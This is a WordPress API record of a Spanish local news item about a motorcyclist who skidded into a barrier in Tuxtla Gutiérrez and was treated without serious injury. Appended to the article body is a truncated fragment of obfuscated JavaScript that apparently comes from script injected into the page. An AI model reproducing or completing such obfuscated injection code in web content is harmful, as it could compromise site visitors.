{"id":21155,"date":"2025-03-29T04:18:12","date_gmt":"2025-03-29T04:18:12","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21155"},"modified":"2025-03-29T04:18:12","modified_gmt":"2025-03-29T04:18:12","slug":"derrapa-motociclista-a-la-altura-del-asta-bandera","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21155","title":{"rendered":"Derrapa motociclista a la altura del asta bandera"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1-1024x768.jpg\" alt=\"\" class=\"wp-image-21156\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1-1536x1152.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250328-WA0029-1.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 28 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un motociclista de aproximadamente 40 a\u00f1os de edad derrap\u00f3 cuando circulaba en el Libramiento Norte, a la altura del asta bandera al tomar la salida hacia el sur.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que el tripulante de la Vento perdi\u00f3 el control al tomar una curva se impact\u00f3 contra el muro de metal y termin\u00f3 contra el pavimento.<\/p>\n\n\n\n<p>Otros motociclista detuvieron su marcha y le brindaron ayuda para evitar otro accidente.<\/p>\n\n\n\n<p>El sujeto fue atendido por param\u00e9dicos de Protecci\u00f3n Civil Municipal pero no present\u00f3 heridas de gravedad.<\/p>\n\n\n\n<p>Finalmente los familiares del accidentado se llevaron la moto y al conductor a su domicilio.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 28 de marzo del 2025. Tuxtla Guti\u00e9rrez.- Un motociclista de aproximadamente 40 a\u00f1os de edad derrap\u00f3 cuando circulaba en el Libramiento Norte, a la altura del asta bandera al tomar la salida hacia el sur. Los reportes oficiales informaron que el tripulante de la Vento perdi\u00f3 el control al tomar una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21156,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21155","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21155","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21155"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21155\/revisions"}],"predecessor-version":[{"id":21157,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21155\/revisions\/21157"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21156"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21155"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21155"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21155"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}